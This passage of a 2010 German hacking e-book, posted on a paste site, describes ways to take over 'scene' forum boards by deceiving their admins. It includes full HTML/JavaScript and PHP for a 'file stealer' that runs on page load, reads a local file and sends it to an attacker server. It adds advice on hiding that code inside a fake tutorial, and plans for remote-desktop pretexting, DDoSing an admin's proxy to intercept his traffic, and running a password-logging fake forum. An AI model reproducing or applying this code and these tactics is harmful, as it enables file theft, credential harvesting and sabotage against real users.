  465. wir sehen das diese auch gelsen werden dann koennen wir ein tutorial reinstellen das nur als
  466. .html datei verfuegbar ist. bei dieser art von datei wird niemand verdacht schoepfen. besonders
  467. nicht die deutschen scene'ler XD vorweg brauchen wir allerdings eine wichtig inforamtion:
  468. wo speichert das opfer die serverdaten ? diese beschaffen wir uns folgendermaßen: wir bringen
  469. den admin dazu mit uns eine remote-desktop session ein zu gehen. also zb mikogo, teamviewer, vnc... etc.
  470. gruende dafuer gibt es viele. wir koennten uns zb die handhabung eines bestimmten programms zeigen
  471. lassen oder einfach begeistert fragen ob wir bei einem hack zusehen duerfen usw.
  472. haben wir einen grund gefunden und sind verbunden mit unserem victim dann praegen wir uns
  473. jede datei die wir sehen ganz genau ein. die meisten leute haben dateien wie "serverdats.txt" oder
  474. aehnliches auf dem desktop. also, wir achten auf jede datei! wenn wir eine datei sehen die, die
  475. serverdaten enthalten koennte dann haben wir vorerst genug informationen. also zb wir sehen die datei
  476. "root.txt" auf dem desktop. als unser opfer auf "start" gedrueckt hat in der taskleiste, haben wir den
  477. username gesehen, der zb bei windows in diesem programmfenster verzeichnet ist. also: server.txt auf dem
  478. desktop und username ist "ichuser" der pfad zu datei waere dann zb:
  479. C:\Dokumente und Einstellungen\ichuser\Desktop\root.txt
  480. web: file:///C:/Dokumente%20und%20Einstellungen/ichuser/Desktop/root.txt
  481. jedenfalls sofern der user auf c used. wenn nicht muessten wir das aber auch spitz kriegen
  482. in unserer desktop session. nun koennen wir unser tutorial erstellen. zwischen viel und damit meine
  483. ich wirklich richtig viel text verstecken wir einen file stealer. ich denke mal sogut wie niemand hat
  484. bis jetzt von html file stealen gehoert. also nehme ich einen code den ich selber mal verfasst hatte.
  485. im grunde koennte es sogar sein das diese idee von mir stammt XD weis aber nich ob schonmal
  486. jemand drauf gekommen is XD
  487. ---
  488. ---html file stealer by unnex---
  489.  
  490. #########sender.html#########
  491.  
  492. <html><head>
  493. <title>html stealer</title>
  494. <script type="text/javascript">
  495. var first = "yes";
  496.  
  497. function uebernahme(dat) {
  498. if(browsertyp == "IE" && first == "no" && dat!=undefined) {
  499. document.x.textausgabe.value+="\n";
  500. location.href="http://[server]/annahme.php?log="+escape(document.x.textausgabe.value);
  501. }
  502. if(dat!=undefined){
  503. document.x.textausgabe.value+=dat;
  504.  
  505. location.href="http://[server]/annahme.php?log="+escape(document.x.textausgabe.value);
  506. first="no";
  507. }
  508. }
  509.  
  510. function read(file) {
  511. var source = "";
  512. if(browsertyp != "IE") {
  513. var url = new java.net.URL(new java.net.URL(window.location.href), file);
  514. var stream = new java.io.DataInputStream(url.openStream());
  515. var line = "";
  516. while ((line = stream.readLine()) != null) {
  517. if(first=="yes") {
  518. source += line;
  519. first="no";
  520. } else {
  521. source += "\n" + line;
  522. }
  523. }
  524. stream.close();
  525. } else {
  526. source = dwn.startDownload(file,uebernahme);
  527. }
  528. return source;
  529. }
  530. </script>
  531. </head>
  532.  
  533. <body bgcolor="white" text="black" link="blue" vlink="purple" alink="red">
  534. <script type="text/javascript">
  535. var browsertyp;
  536. if(!navigator.language || document.defaultCharset) {
  537. browsertyp='IE';
  538. document.write('none download');
  539. } else {
  540. browsertyp='MO';
  541. }
  542. </script>
  543. <form name="x" action="javascript:uebernahme(read(document.x.textfile.value))">
  544. <p><input type="text" name="textfile" value="file:///[local-file]" size="20">
  545. <input type="submit" name="run" value="Datei einlesen"></p>
  546. <p><textarea name="textausgabe" rows="5" cols="15"></textarea></p>
  547. </form><script>document.forms[0].submit()</script>
  548. </body>
  549. </html>
  550.  
  551. #########annahme.php#########
  552.  
  553. <?php
  554. if (isset($_GET["log"])) { echo $_GET["log"];
  555. if (file_exists("[logfile]")) {
  556. $filename="[logfile]";
  557. $fp = fopen($filename,'a');
  558. fwrite($fp, "\r\n\r\n#########next file##########\r\n\r\n" . $_GET["log"]);
  559. fclose($fp); } else { $filename="[logfile]";
  560. $fp = fopen($filename,'w');
  561. fwrite($fp, "$_GET["log"]);
  562. fclose($fp); } }
  563. header('Location: [weiterleitung]');
  564. ?>
  565.  
  566. #########help.txt#########
  567.  
  568. ###html file stealer - by unnex###
  569.  
  570. hilfe:
  571.  
  572. zu bearbeiten:
  573.  
  574. #sender.html
  575. [server]=eigenen server angeben zb: www.meinserver.de
  576. [local-file]=locale zu klauende datei angeben zb: C:/geheim.txt
  577.  
  578. line 9: location.href="http://[server]/save.php?log="+escape(document.x.textausgabe.value);
  579. line 14: location.href="http://[server]/save.php?log="+escape(document.x.textausgabe.value);
  580. line 53: <p><input type="text" name="textfile" value="file:///[local-file]" size="20">
  581.  
  582. #annahme.php
  583.  
  584. [logfile]=logfile angeben wo die daten der geklauten datei gespeichert werden zb: log.txt
  585. [weiterleitung]=wohin das opfer schlussendlich gelinkt werden soll zb http://google.de
  586.  
  587. line 3: if (file_exists("[logfile]")) {
  588. line 4: $filename="[logfile]";
  589. line 7: fclose($fp); } else { $filename="[logfile]";
  590. line 11: header('Location: [weiterleitung]');
  591.  
  592. wird das script im localmode ausgefuehrt, dann wird die datei vom vic uebertragen.
  593. wichtig: sende die datei an dein vic. nicht uppe die datei und sende den link!
  594. ---
  595. wir muessen uns dabei keine sorgen machen das dem admin das auffaellt. denn wie wir wissen ist das
  596. eine methode die sehr selten und spezifisch ist. und deswegen ist es gerade zu laecherlich einem board
  597. admin aus der deutschen scene ausreichende kenntnisse zu zu schreiben, das er diesen angriff erkennen
  598. koennte. wie schon in "1.2 teamanalyse" erwaehnt. hinzu kommend gelten .html dateien sowieso als
  599. unbedenklich.
  600. allerdings sollten wir den code sehr gut verstecken. bzw wir sollten viel stylischen
  601. schnickschnack mit in die html datei bringen damit unser code nicht auffaellt. oder jedes zeichen als
  602. unicode ausgabe nehmen. ebenso kann es nicht schaden wenn wir die html datei grundsaetzlich mit viel
  603. code oder unicode zeichen (oder jedes zeichen als unicode zeichen) zupflastern. wir wollen ja nicht
  604. gefahr laufen das der admin unser tut im texteditor liest.
  605. unser fertiges tutorial+file-stealer stellen wir dann im board online.
  606. folgend schreiben wir den admin an und empfehlen ihm unser tutorial. sollte er kein interesse zeigen,
  607. dann koennen wir auch notfalls die begruendung einbringen das er es sich mal ansehen soll um
  608. verbesserungen oder fehler sagen zu koennen. nun brauchen wir nur noch zu warten bis er sich
  609. unser tutorial zieht und es mit seinem browser oeffnet. der inhalt der root.txt wird an unseren
  610. server geschickt und schon haben wir alle infos die wir zur uebernahme des servers brauchen.
  611. vorteilhaft an dieser methode ist auch das unsere html datei logischerweise mit jedem
  612. browser geoeffnet werden kann. demnach ist unser script nur auf den browser angewiesen, das
  613. betriebssystem spielt also keine rolle bei diesem angriff.
  614.  
  615. 3.2.3 mein nolog, loggt
  616. der name dieses unterpunkts sagt eigentlich schon alles. ich denke mal es ist schnell erklaert^^
  617. bei dieser methode sind wiedermal unsere ressourcen gefragt.
  618. zu aller erst besorgen wir uns die ip des vpn oder socks vom admin. wie wir das machen wissen
  619. wir ja aus "2.1 ip's besorgen". dann melden wir uns im forum an und erstellen einen thread in dem
  620. wir kostenlos nolog-socks anbieten. nun warten wir ein bisschen bis sich unser angebot rummgesprochen
  621. hat. dann ddosn wir den sock vom admin down. viele nutzen gehackte server auf denen sie socks
  622. installiert haben. mit einem mittelmaesigen botnet duerften wir also in den meisten faellen
  623. erfolg haben. nun gibt es zwei moeglichkeiten. entweder der admin nimmt von selbst einen eurer
  624. angebotenen socks oder wir muessen ihm einen aufschwatzen. sollte er von selbst einen von euch nehmen
  625. dann haben wir schon gewonnen. ansonsten: schreiben wir den admin an und erzaehlen ihm von ein paar
  626. servern die wir hacked haben und ihm geben wollen. oder wie fragen ihn ob er eine seite fuer uns hackt.
  627. also, wir reden ihm ein paar dinge ein damit er von ganz allein nach einem sock fragt. sollte er nicht
  628. fragen dann schicken wir ihm einfach einen. egal ob er danach gefragt hat oder nicht. einfach mal den
  629. sock+logindaten dem admin geben. glaubts mir leute, in der not frisst der teufel fliegen ;-)
  630. was der admin mit sicherheit nicht wissen wird ist, das wir im gegensatz zu ihm wissen das die socks5
  631. verschluesselung alles andere als perfekt ist. da uns der sock gehoert und wir den server unter der
  632. fuchtel haben, koennen wir nun frei alle handlungen des admins loggen. im grunde muessen nun nur noch
  633. warten bis der admin sich ueber unseren sock im acp des boards einloggt.
  634.  
  635. 3.3 meine projekte
  636. an dieser stelle sollte erstmal jedem klar sein das ich hier nicht von meinen persoehnlichen projekten
  637. spreche sondern von den einzelnen methoden wie man eigene projekte zum hacken eines deutschen
  638. sceneboards nutzen kann. also nicht vom unterpunkt-titel irritieren lassen.
  639. grundregel fuer diese arten von angriffen ist: "der admin benutzt sogut wie ueberall das selbe passwort".
  640.  
  641. 3.3.1 meine crew
  642. im grunde ist die sache ganz einfach. zu erst einmal brauchen wir ein forensystem. am besten ein sehr
  643. bekanntes was auch viele andere scene-boards nutzen. das setzen wir dann auf nen server und ernennen
  644. es zum scene-board. nun basteln wir die loginfunction ein bisschen um so das alle user+pw geloggt werden.
  645. dann machen wir ein bisschen werbung dafuer. wenn wir ein paar user zusammen haben,
  646. sagen wir mal 20, dann fangen wir an ein paar ahnungslose nicht-scene seiten zu defacen. diese
  647. versehen wir mit werbung fuer unser board. anschließend posten wir unsere defaces auf unserem board
  648. und auf dem board welches wir angreifen wollen. wir verfahren eine weile so weiter bis unser board
  649. ein bisschen bekanntheistgrad im kreise des anderen boards erreicht hat. nun ist es an der zeit
  650. dem admin des victim-boards eine linkpartnerschaft vor zu schlagen. er wird sich bei uns registrieren
  651. muessen um die lage einschaetzen zu koennen. und hier ist auch schon ende vom lied. wenn er sich regt
  652. wird das passwort geloggt und wir koennen es auf sein board anwenden. notfalls koennen wir dem
  653. admin auch vorschlagen einen besonderen titel in unserem board zu bekommen zb. "linkpartner" usw...
  654.  
  655. nachwort:
  656. alle hier beschriebenen methoden wurden von mir selbst schon erfolgreich
  657. durchgefuehrt. natuerlich sind diese taktiken nicht 1zu1 durchfuehrbar.
  658. bzw man muss sie logischerweise angepasst an die gegebenheiten handhaben.
  659.  
  660. jeder der mit social engeneering arbeitet ist darauf bedacht auch nach dem
  661. angriff unentdeckt zu bleiben. allerdings kann man auch mal pech haben :D
  662. aber gerade deswegen kann ich hier auch mal eine referenz fuer die beschriebenen
  663. angriffstalktiken einbringen:
  664.  
  665. "3.1.1 bug fixen" > http://scenewiki.wordpress.com/2010/04/18/cyberterrorists-defaced/
  666.  
  667. vllt. noch ein wort dazu: dieser hack war eher ein fehler. bzw. ich haette die seite nicht
  668. defacen duerfen dann waer ich auch nicht aufgefellen XD ebenso ist dieser admin "bursali"
  669. ein typ der ganz ok ist. es war also eher unberechtigt von mir ihm so in die suppe zu pissen XD
  670.  
  671. ---------
  672. dieses e-book darf nur in unabgeaenderter form frei kopiert werden.
  673. (der gesamte text, auch dieser satz hier, vorwort & nachwort)
  674. dieses e-book dient lediglich zur aufdeckung sowie dem verstaendniss
  675. und der behebung von sicherheitsschwachstellen in deutschen scene-boards.
  676. ich distanziere mic von jeglichem schaden der durch dieses e-book
  677. entstehen kann und weise alle leser darauf hin das die hier gebotenen
  678. informationen nicht fuer kriminelle zwecke missbrauch werden duerfen.
  679.  
  680. ---
  681. greetz unnex
  682.  
  683. ------------------------
  684. <november 2010
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement